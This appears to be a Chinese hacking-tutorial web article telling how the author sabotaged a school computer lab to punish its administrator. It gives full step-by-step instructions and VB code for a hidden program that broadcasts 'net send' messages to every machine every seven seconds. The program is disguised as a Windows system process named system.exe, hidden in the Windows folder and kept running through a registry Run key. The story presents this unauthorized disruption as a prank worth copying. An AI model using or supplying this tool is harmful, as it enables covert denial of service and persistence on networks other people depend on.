减小字体
增大字体- ·上一篇文章:拒绝服务攻击原理
- ·下一篇文章:对一个注册表项的粗略分析
Netsend + VB 小闹win2000局域网
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
喜欢这些内容嘛,请告诉你身边的朋友,易下载中心-QQ资源-itnetcn.com一起享受这份乐趣,本站内容来源互联网
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
喜欢这些内容嘛,请告诉你身边的朋友,易下载中心-QQ资源-itnetcn.com一起享受这份乐趣,本站内容来源互联网
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
学校最近新建了个机房,来了一位新网管,可是没几天,这位新管理员就惹出“公愤”,原因是这位所谓的网管根本就没什么真本事,系里几位计算机爱好者改动一下系统设置,她就大惊小怪地说“不要随便动机子设置,显什么显?就你会计算机?!”,有一次,暗黑之雪发现学校机子几乎全部中了“欢乐时光”病毒,好心好意地查杀病毒,她居然说“你不要随便删除东西哦!”,雪说“这机子有病毒啊!”,她说“没什么大不了的!”(真实之雨晕~~~~~~~),真是菜到家了!
就这样引起大家的公愤,大家一直要求惩罚她。
雪:“TOON,想个办法整整她!”
其他人:“对对,折腾一下她!”
真实之雨:“好啊,我把他推荐给xxx三级片的导演让她去演三级片!”
众人 倒~~~~~~~~~~~~~~~,“我们不是要这样做!”
真实之雨:“嘿嘿,知道了!知道了!我来搞定她!”
3天后,学校的机房出现怪现象,无法正常使用,嘿嘿,那位不学无术的管理员无奈只好请高手出面才搞好。 嘿嘿,那么真实之雨是如何折腾的呢? 雕虫小技而已啦!
大家知道,由WIN2000构成的局域网下有个net send 命令用于在局域网内传送信息,举例如下:
比如在 kof 这个工作组中有个 名为 toon 的计算机,那么我们现在要给这台机子发信息,就“开始”---“运行”--- net send toon 你好, 运行完毕后就会出现一个DOS窗口,发送完毕后,该窗口会自动关闭,也可以进入DOS 直接运行输入运行这个命令!成功后会有提示:
消息已经送到 192.168.0.1(假设这是名为 toon 的计算机的IP地址)
格式总结出来就是这样: net send 计算机名称或者IP地址 信息 (注意格式一定要正确否则不会成功!,该有空格的地方一定要空格!)
而收到信息的机子则这样显示:(假如你的计算机名称是 真实之雨)
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
信使服务 +
+
从真实之雨到2003-4-11:0:16:41 上 192.168.0.1的信息 +
+
你好 +
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
看懂了吧,不必多说,通过这条信息,可以看到谁给你发送的信息以及你的IP地址(192.168.0.1).
以上只是给单个用户发送信息,假如我们要向所有的人发送呢?格式如下:
net send * 哈哈
OK!这样所有的人就都会收到这一信息。看到这里估计你也知道我要做什么了!就是不停地给所有人发信息达到令网络内所有人不可正常使用的目的!
不过我当然不至于傻到自己在机房找台机子整天发信息,况且这样做也就是暴漏自己!现在我就有请VB出场来帮我达到这个目的.
1。在VB中新建立一工程---标准EXE。
2。使用 TIMER 控件,将其 interval 属性设置为 7000。
3。输入代码:
Private Sub Timer1_Timer()
Shell "net send * IP地址冲突", vbHide
End Sub
Private Sub Form_Load()
Form1.Hide
End Sub
好!现在找个象WIN2000系统文件的图标,把FORM的ICON 设置为这个图标文件,然后修改工程名称,改为system,然后生成EXE文件。生成的是system.exe(这些工作都是为了狡猾地隐藏!)
OK!我们在VB中的工作就做到这里,现在我们再接着来:
4。在一个文本文件里输入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"winsystem"="C:\\WINNT\\system.exe"
另存为 eva.reg ,只要是REG文件就好,名字是什么你自己随便了!
5。把system.exe 放到 C:\WINNT 文件夹里,设置属性为 隐藏和只读。如果这机子上设置的是不显示隐藏文件和文件夹,那么刷新后就看不见了。
6。双击刚才我们保存的REG文件,系统提示是否将其内容写入注册表,点“是”。
OK!我们大功告成!现在把这机子关了,快闪人吧!嘿嘿,等下次启动就有好戏看了!这台机子会不停地每隔7秒向所有计算机发送一次信息,够烦人的吧!我的一同学正在玩CS的时候收到这信息,突然就一下子退出来了,然后等他点完确定再回到CS,他已经壮烈牺牲了!呵呵!气得他大骂呢。
下面我详细说一下原理,首先说一下VB中的SHELL 函数,凡可在DOS和WINDOWS下运行的程序都可以使用它来调用。格式如下:
shell (pathname[,windowstyle])
pathname 是包含在双引号中的可执行程序的路径。
windowstyle 为可选参数,vbHide 就是隐藏被调用程序。
实际上除了可以调用程序外,DOS命令和REG注册表文件,也可以被SHELL函数调用。所以 上面的VB程序实际上就是调用NETSEND命令,而且为了不被看出是在做什么,设置调用该命令时隐藏DOS窗口!
至于TIMER ,接触过VB控件的朋友应该很清楚,就是隔多少时间执行一次,这里设置其 interval 属性设置为 7000,也就是每7秒执行一次了!至于 Form1.Hide,则是为了在程序启动的时候隐藏自己。WIN2000本身的进程中有一个必然的sysytem进程,所以这里为了狡猾地隐藏也修改过工程名称和图标,以及EXE文件 名称,让查看进程的人误解为这是WIN2000的系统进程!
而后来生成的REG(注册表文件),是为了将该程序写入系统启动里,这样每次注销或者重新启动都会运行该程序!其实VB中可以调用API函数来直接读写注册表,这里我只是省事而已。
OK!我们就等着看好戏,呵呵,也许你要问我,这样做岂不是连我要在机房使用机子也会受到骚扰?呵呵,我自然有办法了!就是运行一个命令拒绝接受信息,如下:
net stop messenger
OK!假如你是在DOS里直接输入的这命令,那么你还会看到提示信息:
Messenger 服务正在停止.
Messenger 服务已成功停止。
这样我就不会受到骚扰了!如果你想再开启这个信息服务,则运行:
net start messenger
呵呵,就这样,我用小伎俩惩罚了这个傲气的管理员,同志们笑了!樱花开了!:) 就说到这里吧,有疑问的话可以联系我,QQ: 147394763
向所有的黑客们致敬!下次再见!:)
-
